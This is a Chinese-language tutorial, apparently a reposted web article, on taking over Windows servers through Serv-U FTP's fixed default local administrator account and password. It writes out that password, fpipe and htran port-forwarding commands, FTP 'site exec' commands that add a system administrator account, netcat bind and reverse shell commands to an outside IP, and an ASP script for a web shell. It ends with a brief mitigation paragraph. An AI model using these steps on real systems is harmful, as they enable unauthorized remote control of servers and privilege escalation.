serv-u 服務器的配置
理: serv-u默認監聽127.0.0.1:43958,在本機才能鏈接這個管理端口,serv-u默認管理帳號是LocalAdministrator, 默認密碼是"#l@$ak#.lk;0@P",這個密碼是固定的。在目標機器上運行fpipe -v -l 12345 -r 43958 127.0.0.1,而後在你本身的機器,用"serv-u administrator"新建SERVER, 目標IP:12345 User:LocalAdministrator Pass:"#l@$ak#.lk;0@P" 那麼目標機器的serv-u就歸你管了。 利用的前提:要有目標機器的普通權限的SHELL,不須要能終端或物理控制檯登陸,只要有個shell,能運行端口數據轉發的程序就能夠了 如何獲得一個shell:sql注射獲得webshell或者直接利用動網7.0 sp2如下的上傳漏洞上傳webshell 具體實施方法: 1.利用獲得的webshell上傳轉向程序fpipe,而後執行fpipe -v -l 12345 -r 43958 127.0.0.1
字串4
2 .在你本身的機器,用"serv-u administrator"新建SERVER,依次填入 ip:目標IP 端口 :12345 User:LocalAdministrator Pass:"#l@$ak#.lk;0@P" 如今你就能夠管理這臺
服務器
的serv-u了,新建一個帳號,權限爲系統管理員(system administrator),並在"目錄訪問(Dir access)"選項中給予"執行"權限(execute). 3. ftp鏈接,而後執行quote site exec net user iisuser password /add 添加一個用戶名爲iisuser密碼爲password的用戶,加到管理員組 quote site exec net localgroup administrators iisuser /add,如今就能夠鏈接終端並登陸了。 固然也能夠進行別的操做,例如上傳一個nc.exe,在目標機器上獲得一個管理員權限的shell,能夠正向鏈接,也能夠反向鏈接。 正向鏈接:連上ftp之後執行 quote site exec nc.exe -l -p 23 -t -e cmd.exe 這時目標主機就成了一臺telnet服務器,你能夠telnet上目標服務器的23端口. 反向鏈接:假設你的IP是202.96.209.168 1.先在本身的機器上運行(你要有一個外部IP):nc -vv -lp 99 2.在目標機器上運行 nc -e cmd.exe 202.96.209.168 99 字串3 在你的機器上就會獲得一個目標機器的具備管理員權限的shell 若是對方進行了端口過濾或者設置了
防火牆
的保護(這種保護不限制反彈鏈接,若是限制的話就要換別的方法呢),能夠用TCP SOCKET轉發來實現 打個比方: 個人機器爲 A 我要測試的機器爲 B[不容許正面鏈接] 我已經在B上獲得呢一個SHELL[只要guest的就行呢] 咱們能夠這樣連上對方的43958 I:我在本地監聽二個端口23和56 23是等待B來鏈接的~ 56是等待我來鏈接的~ II:B鏈接我監聽的23,同時轉發到本地的43958 這樣管道就建好呢~對方的防火牆就拿咱們沒有辦法呢~ 此時在本地運行SERV-U新建一個SERVER,IP填上本地的127.0.0.1端口爲56,用戶名LocalAdministrator,密碼#l@$ak#.lk;0@P 具體實施方法: 假設你的IP是 202.96.209.168 1.在你本身的機器上運行 htran.exe -listen 23 56 2.此時在本地運行SERV-U新建一個SERVER,IP填上本地的127.0.0.1端口爲56,用戶名LocalAdministrator,密碼#l@$ak#.lk;0@P 3。在目標機器上運行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23 若是不能在webshell下直接運行,能夠寫一個asp腳原本執行,內容以下 字串7 connect.asp <% Set oScript = Server.CreateObject("WSCRIPT.SHELL") oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ") %> 執行
http://目標網址/connect.asp,若是出來一片空白,沒提示什麼錯誤,如今你應該能夠管理目標服務器的serv-u了
餘下的事情就看您自由發揮了。 htran.exe是一個多線程包轉發工具,能夠到紅盟下載
http://www.cnhonker.com/download/releases/Tools/HTran.rar
防止方法: 本身給serv-u打補丁,改變默認端口及管理密碼。改密碼要修改ServUAdmin.exe,ServUDaemon.exe這兩個文件,改端口只要在ServUDaemon.ini文件[GLOBAL]選項中加入LocalSetupPortNo=12345便可很遺憾,在serv-u的最新版本serv-u 5.2.0.0中依然沒有任何改變,默認的管理端口及密碼仍是原來的。
歡迎關注本站公眾號,獲取更多信息